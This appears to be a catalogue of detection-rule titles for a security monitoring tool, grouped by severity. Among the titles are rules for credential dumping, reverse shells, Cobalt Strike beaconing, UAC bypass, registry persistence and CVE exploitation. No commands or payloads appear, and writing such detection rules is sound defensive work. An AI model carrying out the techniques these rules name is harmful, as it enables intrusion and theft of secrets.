  • Suspicious Userinit Child Process
  • Malicious PE Execution by Microsoft Visual Studio Debugger
  • Weak or Abused Passwords In CLI
  • Usage Of Web Request Commands And Cmdlets
  • Uncommon Svchost Parent Process
  • Permission Check Via Accesschk.EXE
  • Active Directory Database Snapshot Via ADExplorer
  • Potential Memory Dumping Activity Via LiveKD
  • Procdump Execution
  • Psexec Execution
  • PsExec Service Execution
  • Suspicious Use of PsLogList
  • Sysinternals PsService Execution
  • Sysinternals PsSuspend Execution
  • Sysmon Configuration Update
  • Potential Binary Impersonating Sysinternals Tools
  • Sysprep on AppData Folder
  • Suspicious Recursive Takeown
  • Tap Installer Execution
  • Loaded Module Enumeration Via Tasklist.EXE
  • Potentially Suspicious Command Targeting Teams Sensitive Files
  • New Virtual Smart Card Created Via TpmVscMgr.EXE
  • Potential RDP Session Hijacking Activity
  • UAC Bypass via Windows Firewall Snap-In Hijack
  • Potential UAC Bypass Via Sdclt.EXE
  • Use of UltraVNC Remote Access Software
  • Windows Credential Manager Access via VaultCmd
  • Verclsid.exe Runs COM Object
  • Suspicious VBoxDrvInst.exe Parameters
  • Potential Persistence Via VMwareToolBoxCmd.EXE VM State Change Script
  • Potentially Suspicious Child Process Of VsCode
  • Visual Studio Code Tunnel Execution
  • Visual Studio Code Tunnel Shell Execution
  • Visual Studio Code Tunnel Service Installation
  • Potential Binary Proxy Execution Via VSDiagnostics.EXE
  • Suspicious Vsls-Agent Command With AgentExtensionPath Load
  • Windows Backup Deleted Via Wbadmin.EXE
  • File Recovery From Backup Via Wbadmin.EXE
  • Potentially Suspicious WebDAV LNK Execution
  • Potential ReflectDebugger Content Execution Via WerFault.EXE
  • Enumerate All Information With Whoami.EXE
  • Group Membership Reconnaissance Via Whoami.EXE
  • Whoami.EXE Execution With Output Option
  • Whoami.EXE Execution Anomaly
  • Suspicious WindowsTerminal Child Processes
  • Add New Download Source To Winget
  • Add Potential Suspicious New Download Source To Winget
  • Install New Package Via Winget Local Manifest
  • Winrar Compressing Dump Files
  • Potentially Suspicious Child Process Of WinRAR.EXE
  • Winrar Execution in Non-Standard Folder
  • AWL Bypass with Winrm.vbs and Malicious WsmPty.xsl/WsmTxt.xsl
  • Remote Code Execute via Winrm.vbs
  • Remote PowerShell Session Host Process (WinRM)
  • Compress Data and Lock With Password for Exfiltration With WINZIP
  • Wlrmdr.EXE Uncommon Argument Or Child Process
  • New Process Created Via Wmic.EXE
  • Computer System Reconnaissance Via Wmic.EXE
  • Hardware Model Reconnaissance Via Wmic.EXE
  • Windows Hotfix Updates Reconnaissance Via Wmic.EXE
  • Process Reconnaissance Via Wmic.EXE
  • Potential Product Reconnaissance Via Wmic.EXE
  • Potential Product Class Reconnaissance Via Wmic.EXE
  • Service Reconnaissance Via Wmic.EXE
  • Uncommon System Information Discovery Via Wmic.EXE
  • Potential Unquoted Service Path Reconnaissance Via Wmic.EXE
  • System Disk And Volume Reconnaissance Via Wmic.EXE
  • WMIC Remote Command Execution
  • Service Started/Stopped Via Wmic.EXE
  • Potential SquiblyTwo Technique Execution
  • Application Terminated Via Wmic.EXE
  • Application Removed Via Wmic.EXE
  • XSL Script Execution Via WMIC.EXE
  • WmiPrvSE Spawned A Process
  • Potential WMI Lateral Movement WmiPrvSE Spawned PowerShell
  • WMI Persistence - Script Event Consumer
  • Potential Dropper Script Execution Via WScript/CScript
  • Cscript/Wscript Potentially Suspicious Child Process
  • WSL Child Process Anomaly
  • Windows Binary Executed From WSL
  • COM Object Execution via Xwizard.EXE
  • Potential Process Hollowing Activity
  • Potential COM Object Hijacking Via TreatAs Subkey - Registry
  • Potential Persistence Via Disk Cleanup Handler - Registry
  • Potential Persistence Via Logon Scripts - Registry
  • PUA - Sysinternals Tools Execution - Registry
  • Windows Recall Feature Enabled - DisableAIDataAnalysis Value Deleted
  • Removal of Potential COM Hijacking Registry Keys
  • Removal Of Index Value to Hide Schedule Task - Registry
  • Removal Of SD Value to Hide Schedule Task - Registry
  • Path To Screensaver Binary Modified
  • New DLL Added to AppCertDlls Registry Key
  • New DLL Added to AppInit_DLLs Registry Key
  • Office Application Startup - Office Test
  • Windows Registry Trust Record Modification
  • New PortProxy Registry Entry Added
  • Run Once Task Configuration in Registry
  • Atbroker Registry Change
  • Enable Remote Connection Between Anonymous Computer - AllowAnonymousCallback
  • Add Port Monitor Persistence in Registry
  • Add Debugger Entry To AeDebug For Persistence
  • Allow RDP Remote Assistance Feature
  • CurrentVersion Autorun Keys Modification
  • Common Autorun Keys Modification
  • Classes Autorun Keys Modification
  • CurrentControlSet Autorun Keys Modification
  • CurrentVersion NT Autorun Keys Modification
  • Internet Explorer Autorun Keys Modification
  • Office Autorun Keys Modification
  • Session Manager Autorun Keys Modification
  • System Scripts Autorun Keys Modification
  • WinSock2 Autorun Keys Modification
  • Wow6432Node CurrentVersion Autorun Keys Modification
  • Wow6432Node Classes Autorun Keys Modification
  • New BgInfo.EXE Custom DB Path Registry Configuration
  • Wow6432Node Windows NT CurrentVersion Autorun Keys Modification
  • New BgInfo.EXE Custom WMI Query Registry Configuration
  • New BgInfo.EXE Custom VBScript Registry Configuration
  • IE Change Domain Zone
  • ClickOnce Trust Prompt Tampering
  • CrashControl CrashDump Disabled
  • Potential Registry Persistence Attempt Via DbgManagedDebugger
  • Windows Defender Exclusions Added - Registry
  • Potentially Suspicious Desktop Background Change Via Registry
  • Disable Exploit Guard Network Protection on Windows Defender
  • Disable Administrative Share Creation at Startup
  • Disable Tamper Protection on Windows Defender
  • Disable Microsoft Defender Firewall via Registry
  • Disable Internal Tools or Feature in Registry
  • Disable Privacy Settings Experience in Registry
  • Disable Windows Security Center Notifications
  • Disable Windows Firewall by Registry
  • Add DisallowRun Execution to Registry
  • Persistence Via Disk Cleanup Handler - Autorun
  • DNS-over-HTTPS Enabled by Registry
  • Periodic Backup For System Registry Hives Enabled
  • Windows Recall Feature Enabled - Registry
  • Enabling COR Profiler Environment Variables
  • Scripted Diagnostics Turn Off Check Enabled - Registry
  • Registry Modification to Hidden File Extension
  • Displaying Hidden Files Feature Disabled
  • Registry Hide Function from User
  • New Root or CA or AuthRoot Certificate to Store
  • Internet Explorer DisableFirstRunCustomize Enabled
  • Potential Persistence Via Netsh Helper DLL - Registry
  • Potential Credential Dumping Attempt Using New NetworkProvider - REG
  • Enable Microsoft Dynamic Data Exchange
  • Outlook Security Settings Updated - Registry
  • Potential Persistence Using DebugPath
  • Potential Persistence Via AppCompat RegisterAppRestart Layer
  • Potential Persistence Via Custom Protocol Handler
  • Potential Persistence Via Event Viewer Events.asp
  • Register New IFiltre For Persistence
  • Potential Persistence Via Scrobj.dll COM Hijacking
  • Potential Persistence Via Visual Studio Tools for Office
  • Potential Persistence Via Shim Database Modification
  • Potential PowerShell Execution Policy Tampering
  • Suspicious Powershell In Registry Run Keys
  • ScreenSaver Registry Key Set
  • Potential SentinelOne Shell Context Menu Scan Command Tampering
  • ServiceDll Hijack
  • Registry Explorer Policy Modification
  • Persistence Via New SIP Provider
  • Activate Suppression of Windows Security Center Notifications
  • Suspicious Keyboard Layout Load
  • Potential PendingFileRenameOperations Tampering
  • Suspicious Service Installed
  • RDP Sensitive Settings Changed to Zero
  • Old TLS1.0/TLS1.1 Protocol Version Enabled
  • COM Hijacking via TreatAs
  • UAC Disabled
  • UAC Notification Disabled
  • UAC Secure Desktop Prompt Disabled
  • Enable Local Manifest Installation With Winget
  • Winlogon AllowMultipleTSSessions Enable
  • Sysmon Configuration Change
  • Sysmon File Executable Creation Detected
  • WMI Event Subscription
  • Exploit for CVE-2017-0261
  • Defrag Deactivation
  • Defrag Deactivation - Security
  • Potential APT-C-12 BlueMushroom DLL Load Activity Via Regsvr32
  • Potential CVE-2021-27905 Exploitation Attempt
  • Potential CVE-2021-42278 Exploitation Attempt
  • Potential CVE-2022-22954 Exploitation Attempt - VMware Workspace ONE Access Remote Code Execution
  • Zimbra Collaboration Suite Email Server Unauthenticated RCE
  • CVE-2022-31659 VMware Workspace ONE Access RCE
  • Suspicious Set Value of MSDT in Registry (CVE-2022-30190)
  • CVE-2023-1389 Potential Exploitation Attempt - Unauthenticated Command Injection In TP-Link Archer AX21
  • CVE-2023-22518 Exploitation Attempt - Suspicious Confluence Child Process (Windows)
  • CVE-2023-22518 Exploitation Attempt - Vulnerable Endpoint Connection (Proxy)
  • CVE-2023-22518 Exploitation Attempt - Vulnerable Endpoint Connection (Webserver)
  • Potential CVE-2023-2283 Exploitation
  • Potential CVE-2023-23397 Exploitation Attempt - SMB
  • Potential CVE-2023-27997 Exploitation Indicators
  • Potential MOVEit Transfer CVE-2023-34362 Exploitation - Dynamic Compilation Via Csc.EXE
  • Potential CVE-2023-36874 Exploitation - Uncommon Report.Wer Location
  • Potential CVE-2023-36884 Exploitation Dropped File
  • Potential CVE-2023-36884 Exploitation - File Downloads
  • CVE-2023-40477 Potential Exploitation - WinRAR Application Crash
  • Potential CVE-2023-46214 Exploitation Attempt
  • CVE-2023-4966 Potential Exploitation Attempt - Citrix ADC Sensitive Information Disclosure - Proxy
  • CVE-2023-4966 Potential Exploitation Attempt - Citrix ADC Sensitive Information Disclosure - Webserver
  • DarkGate - Autoit3.EXE File Creation By Uncommon Process
  • Potential Pikabot Infection - Suspicious Command Combinations Via Cmd.EXE
  • Rhadamanthys Stealer Module Launch Via Rundll32.EXE
  • Potential Encrypted Registry Blob Related To SNAKE Malware
  • DLL Names Used By SVR For GraphicalProton Backdoor
  • Okta 2023 Breach Indicator Of Compromise
  • Potential Peach Sandstorm APT C2 Communication Activity
  • CVE-2024-1708 - ScreenConnect Path Traversal Exploitation
  • ScreenConnect User Database Modification
  • ScreenConnect User Database Modification - Security
  • Potential CVE-2024-3400 Exploitation - Palo Alto GlobalProtect OS Command Injection - File Creation
  • DarkGate - Drop DarkGate Loader In C:\Temp Directory
  • Potential KamiKakaBot Activity - Lure Document Execution
  • Potential KamiKakaBot Activity - Shutdown Schedule Task Creation
  • Kapeka Backdoor Configuration Persistence
  • Potential APT FIN7 Exploitation Activity
  • Forest Blizzard APT - JavaScript Constrained File Creation
  • Account Created And Deleted By Non Approved Users
  • Potential Pass the Hash Activity
  • Remote Registry Management Using Reg Utility
  • Interactive Logon to Server Systems
  • Mail Forwarding/Redirecting Activity In O365
  • Python Path Configuration File Creation - Linux
  • Terminate Linux Process Via Kill
  • Python Path Configuration File Creation - MacOS
  • Clipboard Data Collection Via Pbpaste
  • .Class Extension URI Ending Request
  • Potential Remote WMI ActiveScriptEventConsumers Activity
  • CreateRemoteThread API and LoadLibrary
  • Remote Thread Creation Via PowerShell
  • Access To Sysvol Policies Share By Uncommon Process
  • Python Path Configuration File Creation - Windows
  • VsCode Code Tunnel Execution File Indicator
  • WebDAV Temporary Local File Creation
  • Non-DLL Extension File Renamed With DLL Extension
  • Dbghelp/Dbgcore DLL Loaded By Uncommon/Suspicious Process
  • Dfsvc.EXE Network Connection To Non-Local IPs
  • Dllhost.EXE Initiated Network Connection To Non-Local IP Address
  • HH.EXE Initiated HTTP Network Connection
  • Potentially Suspicious Azure Front Door Connection
  • Network Connection Initiated From Users\Public Folder
  • Uncommon PowerShell Hosts
  • Windows Mail App Mailbox Access Via PowerShell Script
  • SMB over QUIC Via PowerShell Script
  • Potential Registry Reconnaissance Via PowerShell Script
  • Potential Data Exfiltration Over SMTP Via Send-MailMessage Cmdlet
  • WinAPI Library Calls Via PowerShell Scripts
  • WinAPI Function Calls Via PowerShell Scripts
  • Potential Credential Dumping Attempt Via PowerShell
  • LSASS Access From Program In Potentially Suspicious Folder
  • Uncommon GrantedAccess Flags On LSASS
  • Potential Shellcode Injection
  • Headless Process Launched Via Conhost.EXE
  • Dynamic .NET Compilation Via Csc.EXE - Hunting
  • File Download Via Curl.EXE
  • Potential Data Exfiltration Via Curl.EXE
  • Diskshadow Child Process Spawned
  • Curl.EXE Execution With Custom UserAgent
  • ClickOnce Deployment Execution - Dfsvc.EXE Child Process
  • Diskshadow Script Mode Execution
  • Potential DLL Sideloading Activity Via ExtExport.EXE
  • Potential Password Reconnaissance Via Findstr.EXE
  • New Self Extracting Package Created Via IExpress.EXE
  • Microsoft Workflow Compiler Execution
  • SMB over QUIC Via Net.EXE
  • Suspicious New Instance Of An Office COM Object
  • Invocation Of Crypto-Classes From The "Cryptography" PowerShell Namespace
  • Potentially Suspicious PowerShell Child Processes
  • Regsvr32.EXE Calling of DllRegisterServer Export Function Implicitly
  • Remote Access Tool - Action1 Arbitrary Code Execution and Remote Sessions
  • Remote Access Tool - Ammy Admin Agent Execution
  • Remote Access Tool - Cmd.EXE Execution via AnyViewer
  • Remote Access Tool - ScreenConnect Remote Command Execution - Hunting
  • DLL Call by Ordinal Via Rundll32.EXE
  • Rundll32.EXE Calling DllRegisterServer Export Function Explicitly
  • Scheduled Task Creation From Potential Suspicious Parent Location
  • Potential CommandLine Obfuscation Using Unicode Characters
  • Potentially Suspicious Compression Tool Parameters
  • Elevated System Shell Spawned
  • EventLog Query Requests By Builtin Utilities
  • Execution From Webserver Root Folder
  • Tunneling Tool Execution
  • File or Folder Permissions Modifications
  • Manual Execution of Script Inside of a Compressed File
  • WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
  • Arbitrary Command Execution Using WSL
  • Cab File Extraction Via Wusa.EXE
  • Microsoft Office Trusted Location Updated
  • Registry Set With Crypto-Classes From The "Cryptography" PowerShell Namespace
  • Service Binary in User Controlled Folder
  • AWS EC2 Download Userdata
  • Potential Backup Enumeration on AWS
  • Potential Storage Enumeration on AWS
  • AWS Macie Evasion
  • Potential AWS Cloud Email Service Abuse
  • Use of Debugfs to Access a Raw Disk
  • Failed Logins with Different Accounts from Single Source - Linux
  • Privilege Escalation Preparation
  • High DNS Bytes Out
  • High NULL Records Requests Rate
  • High DNS Requests Rate
  • High TXT Records Requests Rate
  • High DNS Bytes Out - Firewall
  • High DNS Requests Rate - Firewall
  • Network Scans Count By Destination IP
  • Possible DNS Rebinding
  • Network Scans Count By Destination Port
  • Multiple Modsecurity Blocks
  • Multiple Suspicious Resp Codes Caused by Single Client
  • Possible DNS Rebinding
  • Invoke-Obfuscation COMPRESS OBFUSCATION
  • Invoke-Obfuscation RUNDLL LAUNCHER
  • Tap Driver Installation
  • Mimikatz In-Memory
  • Automated Turla Group Lateral Movement
  • Reconnaissance Activity Using BuiltIn Commands
  • Files Dropped to Program Files by Non-Priviledged Process
  • Dumping ntds.dit remotely via DCSync
  • Dumping ntds.dit remotely via NetSync
  • Remote Schtasks Creation
  • Enumeration via the Global Catalog
  • Password Spraying via Explicit Credentials
  • Multiple Users Failing to Authenticate from Single Process
  • Failed Logins with Different Accounts from Single Source System
  • Failed NTLM Logins with Different Accounts from Single Source System
  • Valid Users Failing to Authenticate From Single Source Using Kerberos
  • Disabled Users Failing To Authenticate From Source Using Kerberos
  • Invalid Users Failing To Authenticate From Source Using Kerberos
  • Valid Users Failing to Authenticate from Single Source Using NTLM
  • Invalid Users Failing To Authenticate From Single Source Using NTLM
  • Multiple Users Remotely Failing To Authenticate From Single Source
  • Suspicious Multiple File Rename Or Delete Occurred
  • Possible Remote Password Change Through SAMR
  • Suspicious Werfault.exe Network Connection Outbound
  • Failed Mounting of Hidden Share
  • Domain User Enumeration Network Recon 01
  • Potential Exfiltration of Compressed Files
low 334
Show Rules (334)
  • Vulnerable Driver Load By Name
  • Alternate PowerShell Hosts - Image
  • Powershell File and Directory Discovery
  • Suspicious Get-WmiObject
  • Suspicious In-Memory Module Execution
  • Indirect Command Execution
  • New Service Creation
  • Possible Applocker Bypass
  • Stop Windows Service
  • Process Start From Suspicious Folder
  • PsExec Tool Execution
  • PsExec Service Start
  • Lateral Movement Indicator ConDrv
  • Group Modification Logging
  • Deployment Deleted From Kubernetes Cluster
  • Container With A hostPath Mount Created
  • Privileged Container Deployed
  • RBAC Permission Enumeration Attempt
  • Kubernetes Secrets Enumeration
  • New Kubernetes Service Account Created
  • Kubernetes Unauthorized or Unauthenticated Access
  • New Network ACL Entry Added
  • AWS EC2 VM Export Failure
  • AWS EKS Cluster Created or Deleted
  • AWS ElastiCache Security Group Created
  • AWS ElastiCache Security Group Modified or Deleted
  • Potential Bucket Enumeration on AWS
  • AWS Glue Development Endpoint Activity
  • AWS Route 53 Domain Transfer Lock Disabled
  • AWS Route 53 Domain Transferred to Another Account
  • AWS S3 Data Management Tampering
  • AWS STS AssumeRole Misuse
  • AWS STS GetSessionToken Misuse
  • Azure Container Registry Created or Deleted
  • Azure Kubernetes Cluster Created or Deleted
  • End User Consent
  • Measurable Increase Of Successful Authentications
  • Failed Authentications From Countries You Do Not Operate Out Of
  • Azure AD Only Single Factor Authentication Required
  • Sign-ins by Unknown Devices
  • Bitbucket Project Secret Scanning Allowlist Added
  • Bitbucket Secret Scanning Rule Deleted
  • Google Cloud Storage Buckets Enumeration
  • Github New Secret Created
  • Github Push Protection Bypass Detected
  • Github Self Hosted Runner Changes Detected
  • Suspicious Inbox Forwarding
  • Okta Policy Modified or Deleted
  • OneLogin User Assumed Another User
  • OneLogin User Account Locked
  • Host Without Firewall
  • Cleartext Protocol Usage Via Netflow
  • Audio Capture
  • Linux Capabilities Discovery
  • Clipboard Collection with Xclip Tool - Auditd
  • Clipboard Collection of Image Data with Xclip Tool
  • Data Compressed
  • Overwriting the File with Dev Zero or Null
  • File or Folder Permissions Change
  • Use Of Hidden Paths Or Files
  • Hidden Files and Directories
  • Steganography Hide Zip Information in Picture File
  • Linux Network Service Scanning - Auditd
  • Network Sniffing - Linux
  • Password Policy Discovery - Linux
  • Systemd Service Reload or Start
  • Screen Capture with Import Tool
  • Screen Capture with Xwd
  • Split A File Into Pieces - Linux
  • Steganography Hide Files with Steghide
  • Steganography Extract Files with Steghide
  • System Information Discovery - Auditd
  • Steganography Unzip Hidden Information From Picture File
  • System Owner or User Discovery - Linux
  • Remote File Copy
  • Space After Filename
  • Potentially Suspicious Shell Script Creation in Profile Folder
  • Scheduled Task/Job At
  • Decode Base64 Encoded Text
  • Bash Interactive Shell
  • Capabilities Discovery - Linux
  • Clipboard Collection with Xclip Tool
  • Crontab Enumeration
  • Curl Usage on Linux
  • DD File Overwrite
  • Linux Doas Tool Execution
  • OS Architecture Discovery Via Grep
  • Install Root Certificate
  • Local System Accounts Discovery - Linux
  • Local Groups Discovery - Linux
  • Named Pipe Created Via Mkfifo
  • Connection Proxy
  • Remote Access Tool - Team Viewer Session Started On Linux Host
  • Linux Remote System Discovery
  • Linux Package Uninstall
  • Security Software Discovery - Linux
  • Setuid and Setgid
  • Container Residence Discovery Via Proc Virtual FS
  • Docker Container Discovery Via Dockerenv Listing
  • Potential Container Discovery Via Inodes Listing
  • Linux Network Service Scanning Tools Execution
  • System Network Connections Discovery - Linux
  • Startup Item File Created - MacOS
  • Decode Base64 Encoded Text -MacOs
  • Creation Of A Local User Account
  • System Integrity Protection (SIP) Enumeration
  • GUI Input Capture - macOS
  • JAMF MDM Execution
  • Local System Accounts Discovery - MacOs
  • MacOS Network Service Scanning
  • Remote Access Tool - Team Viewer Session Started On MacOS Host
  • Screen Capture - macOS
  • Space After Filename - macOS
  • Split A File Into Pieces
  • Guest Account Enabled Via Sysadminctl
  • Gatekeeper Bypass via Xattr
  • Cisco Collect Data
  • Cisco Discovery
  • Cisco Stage Data
  • Cisco BGP Authentication Failures
  • Cisco LDP Authentication Failures
  • Cleartext Protocol Usage
  • Huawei BGP Authentication Failures
  • Juniper BGP Missing MD5
  • DNS Events Related To Mining Pools
  • New Kind of Network (NKN) Detection
  • WebDav Put Request
  • Download From Suspicious TLD - Blacklist
  • Download From Suspicious TLD - Whitelist
  • Suspicious Network Communication With IPFS
  • Application Uninstalled
  • MSSQL Server Failed Logon
  • Remote Access Tool - ScreenConnect Command Execution
  • Remote Access Tool - ScreenConnect File Transfer
  • Sysinternals Tools AppX Versions Execution
  • New BITS Job Created Via Bitsadmin
  • New BITS Job Created Via PowerShell
  • CodeIntegrity - Unmet Signing Level Requirements By File Under Validation
  • DNS Query To Ufile.io - DNS Client
  • USB Device Plugged
  • The Windows Defender Firewall Service Failed To Load Group Policy
  • Windows Defender Firewall Has Been Reset To Its Default Configuration
  • Windows Firewall Settings Have Been Changed
  • Previously Installed IIS Module Was Removed
  • NTLM Logon
  • ADCS Certificate Template Configuration Vulnerability
  • Add or Remove Computer from DC
  • Access To ADMIN$ Network Share
  • Windows Event Auditing Disabled
  • External Disk Drive Or USB Storage Device Was Recognized By The System
  • Service Registry Key Read Access Request
  • Unauthorized System Time Modification
  • Tap Driver Installation - Security
  • Local User Creation
  • Admin User Remote Logon
  • A Member Was Removed From a Security-Enabled Global Group
  • A Member Was Added to a Security-Enabled Global Group
  • A Security-Enabled Global Group Was Deleted
  • Outgoing Logon with New Credentials
  • Successful Account Login Via WMI
  • Active Directory Certificate Services Denied Certificate Enrollment Request
  • No Suitable Encryption Key Found For Generating Kerberos Ticket
  • Volume Shadow Copy Mount
  • Suspicious Usage of CVE_2021_34484 or CVE 2022_21919
  • Windows Service Terminated With Error
  • Windows Defender Submit Sample Feature Disabled
  • DNS Server Discovery Via LDAP Query
  • DNS Query Request By QuickAssist.EXE
  • DNS Query Request To OneLaunch Update Service
  • DNS Query To Ufile.io
  • Vulnerable Driver Load By Name
  • TeamViewer Log File Deleted
  • Dynamic CSharp Compile Artefact
  • NTDS.DIT Created
  • Office Macro File Creation
  • PowerShell Script Dropped Via PowerShell.EXE
  • PowerShell Module File Created
  • Remote Access Tool - ScreenConnect Temporary File
  • PsExec Service File Creation
  • Potential Azure Browser SSO Abuse
  • Load Of RstrtMgr.DLL By An Uncommon Process
  • Potential 7za.DLL Sideloading
  • Network Connection Initiated To Mega.nz
  • Potentially Suspicious Network Connection To Notion API
  • Remote PowerShell Session (PS Classic)
  • Renamed Powershell Under Powershell Channel
  • Use Get-NetTCPConnection
  • AD Groups Or Users Enumeration Using PowerShell - PoshModule
  • Use Get-NetTCPConnection - PowerShell Module
  • Suspicious Get Local Groups Information
  • Suspicious Get Information for SMB Share - PowerShell Module
  • Active Directory Computers Enumeration With Get-AdComputer
  • Active Directory Group Enumeration With Get-AdGroup
  • Automated Collection Bookmarks Using Get-ChildItem PowerShell
  • PowerShell Script With File Upload Capabilities
  • PowerShell Script Change Permission Via Set-Acl - PsScript
  • AD Groups Or Users Enumeration Using PowerShell - ScriptBlock
  • Potential PowerShell Obfuscation Using Character Join
  • Password Policy Discovery With Get-AdDefaultDomainPasswordPolicy
  • Suspicious PowerShell Get Current User
  • Suspicious GPO Discovery With Get-GPO
  • Suspicious Process Discovery With Get-Process
  • Suspicious Get Local Groups Information - PowerShell
  • Suspicious Mount-DiskImage
  • Suspicious Connection to Remote Account
  • Suspicious Get Information for SMB Share
  • Potential PowerShell Obfuscation Using Alias Cmdlets
  • Suspicious SSL Connection
  • Powershell Suspicious Win32_PnPEntity
  • Replace Desktop Wallpaper by Powershell
  • Uncommon Process Access Rights For Target Image
  • BitLockerTogo.EXE Execution
  • Data Copied To Clipboard Via Clip.EXE
  • Change Default File Association Via Assoc
  • File Deletion Via Del
  • File And SubFolder Enumeration Via Dir Command
  • Directory Removal Via Rmdir
  • DirLister Execution
  • Insensitive Subfolder Search Via Findstr.EXE
  • Fsutil Drive Enumeration
  • HH.EXE Execution
  • Suspicious Execution of Hostname
  • JScript Compiler Execution
  • Indirect Command Execution By Program Compatibility Wizard
  • Mstsc.EXE Execution With Local RDP File
  • Firewall Configuration Discovery Via Netsh.EXE
  • Unmount Share Via Net.EXE
  • Start Windows Service Via Net.EXE
  • Stop Windows Service Via Net.EXE
  • Windows Share Mount Via Net.EXE
  • System Network Connections Discovery Via Net.EXE
  • Share And Session Enumeration Using Net.EXE
  • Nltest.EXE Execution
  • New Service Creation Using PowerShell
  • Potential Encoded PowerShell Patterns In CommandLine
  • Non Interactive PowerShell Process Spawned
  • Stop Windows Service Via PowerShell Stop-Service
  • PUA - Adidnsdump Execution
  • QuickAssist Execution
  • Files Added To An Archive Using Rar.EXE
  • Exports Registry Key To a File
  • Registry Modification Via Regini.EXE
  • Suspicious Query of MachineGUID
  • Remote Access Tool - ScreenConnect Remote Command Execution
  • Remote Access Tool - Team Viewer Session Started On Windows Host
  • Discovery of a System Time
  • Run Once Task Execution as Configured in Registry
  • Scheduled Task Creation Via Schtasks.EXE
  • New Service Creation Using Sc.EXE
  • Interesting Service Enumeration Via Sc.EXE
  • Stop Windows Service Via Sc.EXE
  • Local Accounts Discovery
  • Suspicious Network Command
  • Windows Processes Suspicious Parent Directory
  • Malicious Windows Script Components File Execution by TAEF Detection
  • Potential Execution of Sysinternals Tools
  • Suspicious Execution of Systeminfo
  • Compressed File Creation Via Tar.EXE
  • Compressed File Extraction Via Tar.EXE
  • New Process Created Via Taskmgr.EXE
  • Detect Virtualbox Driver Installation OR Starting Of VMs
  • Suspicious Where Execution
  • Whoami Utility Execution
  • Local Groups Reconnaissance Via Wmic.EXE
  • Potential Defense Evasion Via Raw Disk Access By Uncommon Tools
  • PUA - Sysinternal Tool Execution - Registry
  • New ODBC Driver Registered
  • MaxMpxCt Registry Value Changed
  • Modification of IE Registry Settings
  • PowerShell Script Execution Policy Enabled
  • ETW Logging Disabled For rpcrt4.dll
  • ETW Logging Disabled For SCM
  • Winget Admin Settings Modification
  • Outlook Task/Note Reminder Received
  • CVE-2023-40477 Potential Exploitation - .REV File Creation
  • SNAKE Malware Installer Name Indicators
  • Potential Raspberry Robin Registry Set Internet Settings ZoneMap
  • Authentication Occuring Outside Normal Business Hours
  • User with Privileges Logon
  • DNS Request From Windows Script Host
  • Userdomain Variable Enumeration
  • Okta Password Health Report Query
  • Process Discovery
  • Firewall Rule Modified In The Windows Firewall Exception List
  • Access To Browser Credential Files By Uncommon Applications - Security
  • Scheduled Task Deletion
  • Access To Browser Credential Files By Uncommon Applications
  • Access To Chromium Browsers Sensitive Files By Uncommon Applications
  • Access To Windows Outlook Mail Files By Uncommon Applications
  • Access To .Reg/.Hive Files By Uncommon Applications
  • Unattend.XML File Access Attempt
  • ADS Zone.Identifier Deleted
  • DMP/HDMP File Creation
  • Scheduled Task Created - FileCreation
  • Creation of an Executable by an Executable
  • Amsi.DLL Load By Uncommon Process
  • System Drawing DLL Load
  • Task Scheduler DLL Loaded By Application Located In Potentially Suspicious Location
  • Microsoft Excel Add-In Loaded
  • Microsoft Word Add-In Loaded
  • WMI Module Loaded By Uncommon Process
  • Msiexec.EXE Initiated Network Connection Over HTTP
  • Network Connection Initiated By PowerShell Process
  • PsExec Default Named Pipe
  • bXOR Operator Usage In PowerShell Command Line - PowerShell Classic
  • Local Firewall Rules Enumeration Via NetFirewallRule Cmdlet
  • Compress-Archive Cmdlet Execution
  • New Windows Firewall Rule Added Via New-NetFirewallRule Cmdlet - ScriptBlock
  • Use Of Remove-Item to Delete File - ScriptBlock
  • Password Protected Compressed File Extraction Via 7Zip
  • Set Files as System Files Using Attrib.EXE
  • CMD Shell Output Redirect
  • Potential File Override/Append Via SET Command
  • Curl.EXE Execution
  • Potential Proxy Execution Via Explorer.EXE From Shell Process
  • CodePage Modification Via MODE.COM
  • Net.EXE Execution
  • Import New Module Via PowerShell CommandLine
  • Unusually Long PowerShell CommandLine
  • New Windows Firewall Rule Added Via New-NetFirewallRule Cmdlet
  • SC.EXE Query Execution
  • Potential Suspicious Execution From GUID Like Folder Names
  • Process Terminated Via Taskkill
  • System Information Discovery Via Wmic.EXE
  • Scheduled Task Created - Registry
  • Command Executed Via Run Dialog Box - Registry
  • Shell Context Menu Command Tampering
  • Account Enumeration on AWS
  • Potential Network Enumeration on AWS
  • AWS Lambda Function Created or Invoked
  • Quick Execution of a Series of Suspicious Commands
  • Rare Schtasks Creations
  • Rare Service Installations
  • Rare Scheduled Task Creations
critical 186
Show Rules (186)
  • CobaltStrike Malformed UAs in Malleable Profiles
  • iOS Implant URL Pattern
  • Credential Dumping Tools Service Execution
  • Mimikatz MemSSP Default Log File Creation
  • Dnscat Execution
  • Credential Dumping by LaZagne
  • Credential Dumping by Pypykatz
  • CrackMapExecWin
  • Lazarus Loaders
  • DNS Tunnel Technique from MuddyWater
  • TA505 Dropper Load Pattern
  • Ryuk Ransomware Command Line Activity
  • DCOM InternetExplorer.Application Iertutil DLL Hijack - Sysmon
  • Antivirus Exploitation Framework Detection
  • Antivirus Password Dumper Detection
  • Antivirus Ransomware Detection
  • Bitbucket Unauthorized Access To A Resource
  • Bitbucket Unauthorized Full Data Export Triggered
  • Possible Coin Miner CPU Priority Param
  • Webshell Remote Command Execution
  • Sudo Privilege Escalation CVE-2019-14287 - Builtin
  • Linux Reverse Shell Indicator
  • Cobalt Strike DNS Beaconing
  • HackTool - BabyShark Agent Default URL Pattern
  • PwnDrp Access
  • Audit CVE Event
  • Suspicious Cobalt Strike DNS Beaconing - DNS Client
  • ProxyLogon MSExchange OabVirtualDirectory
  • Mailbox Export to Exchange Webserver
  • Certificate Request Export to Exchange Webserver
  • AD Object WriteDAC Access
  • Active Directory Replication from Non Machine Account
  • WCE wceaux.dll Access
  • Win Susp Computer Name Containing Samtheadmin
  • DiagTrackEoP Default Login Username
  • Zerologon Exploitation Using Well-known Tools
  • CobaltStrike Service Installations - System
  • Moriya Rootkit - System
  • Suspicious Cobalt Strike DNS Beaconing - Sysmon
  • Potential DCOM InternetExplorer.Application DLL Hijack
  • HackTool - Dumpert Process Dumper Default File
  • HackTool - Inveigh Execution Artefacts
  • HackTool - Mimikatz Kirbi File Creation
  • HackTool - QuarksPwDump Dump File
  • Wmiexec Default Output File
  • Wmiprvse Wbemcomn DLL Hijack - File
  • Potential DCOM InternetExplorer.Application DLL Hijack - Image Load
  • CobaltStrike Named Pipe
  • CobaltStrike Named Pipe Pattern Regex
